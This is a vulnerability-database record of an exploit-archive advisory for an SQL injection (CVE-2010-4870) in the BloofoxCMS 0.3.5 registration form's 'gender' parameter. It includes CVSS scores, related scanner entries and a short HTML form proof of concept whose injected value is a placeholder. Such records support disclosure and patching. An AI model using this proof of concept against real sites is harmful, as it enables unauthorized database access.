BloofoxCMS Registration Plugin SQL Injection Vulnerability

{"bulletinFamily": "exploit", "id": "EDB-ID:15328", "cvelist": ["CVE-2010-4870"], "modified": "2010-10-27T00:00:00", "lastseen": "2016-02-01T21:35:06", "edition": 1, "sourceData": "Vulnerability ID: HTB22658\r\nReference: http://www.htbridge.ch/advisory/sql_injection_in_bloofoxcms_registration_plugin.html\r\nProduct: BloofoxCMS \r\nVendor: bloofox.com ( http://bloofox.com/ ) \r\nVulnerable Version: 0.3.5 and probably prior versions \r\nVendor Notification: 13 October 2010 \r\nVulnerability Type: SQL Injection\r\nStatus: Not Fixed, Vendor Alerted, Awaiting Vendor Response\r\nRisk level: High \r\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) \r\n\r\nVulnerability Details:\r\nThe vulnerability exists due to failure in the \"/index.php\" script to properly sanitize user-supplied input in gender variable.\r\n\r\nThe following PoC is available:\r\n\r\n\r\n<form action=\"http://host/index.php?page=8\" method=\"post\">\r\n<input type=\"hidden\" name=\"un\" value=\"testuser\">\r\n<input type=\"hidden\" name=\"pwd\" value=\"123456\">\r\n<input type=\"hidden\" name=\"pwd2\" value=\"123456\">\r\n<input type=\"hidden\" name=\"em\" value=\"email@email.com\">\r\n<input type=\"hidden\" name=\"gender\" value=\"'SQL_CODE_HERE\">\r\n<input name=\"send\" value=\"Register & Create Account\" type=\"submit\">\r\n</form>\r\n\r\n\r\n\r\n", "published": "2010-10-27T00:00:00", "href": "https://www.exploit-db.com/exploits/15328/", "osvdbidlist": ["71322"], "reporter": "High-Tech Bridge SA", "hash": "00d82df72ec9697194ab1c347e8043244ddba018a87525c7bc75828fa30a11d4", "title": "BloofoxCMS Registration Plugin SQL Injection Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "BloofoxCMS Registration Plugin SQL Injection Vulnerability. CVE-2010-4870. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/15328/", "enchantments": {"vulnersScore": 6.0}}

{"result": {"cve": [{"id": "CVE-2010-4870", "type": "cve", "title": "CVE-2010-4870", "description": "SQL injection vulnerability in index.php in BloofoxCMS 0.3.5 allows remote attackers to execute arbitrary SQL commands via the gender parameter.", "published": "2011-10-07T06:55:06", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4870", "cvelist": ["CVE-2010-4870"], "lastseen": "2016-09-03T14:43:18"}], "seebug": [{"id": "SSV-70068", "type": "seebug", "title": "BloofoxCMS Registration Plugin SQL Injection Vulnerability", "description": "Summary: \nBloofoxCMS 0.3.5 version of the index. in php there is a SQL injection vulnerability. A remote attacker may be by means of a gender parameter to execute arbitrary SQL commands.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-70068", "cvelist": ["CVE-2010-4870"], "lastseen": "2016-07-29T17:29:13"}], "openvas": [{"id": "OPENVAS:100877", "type": "openvas", "title": "bloofoxCMS 'gender' Parameter SQL Injection Vulnerability", "description": "bloofoxCMS is prone to an SQL-injection vulnerability because it\nfails to sufficiently sanitize user-supplied data before using it in\nan SQL query.\n\nExploiting this issue can allow an attacker to compromise the\napplication, access or modify data, or exploit latent vulnerabilities\nin the underlying database.\n\nbloofoxCMS 0.3.5 is vulnerable; other versions may also be affected.", "published": "2010-10-28T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=100877", "cvelist": ["CVE-2010-4870"], "lastseen": "2017-07-02T21:09:54"}]}}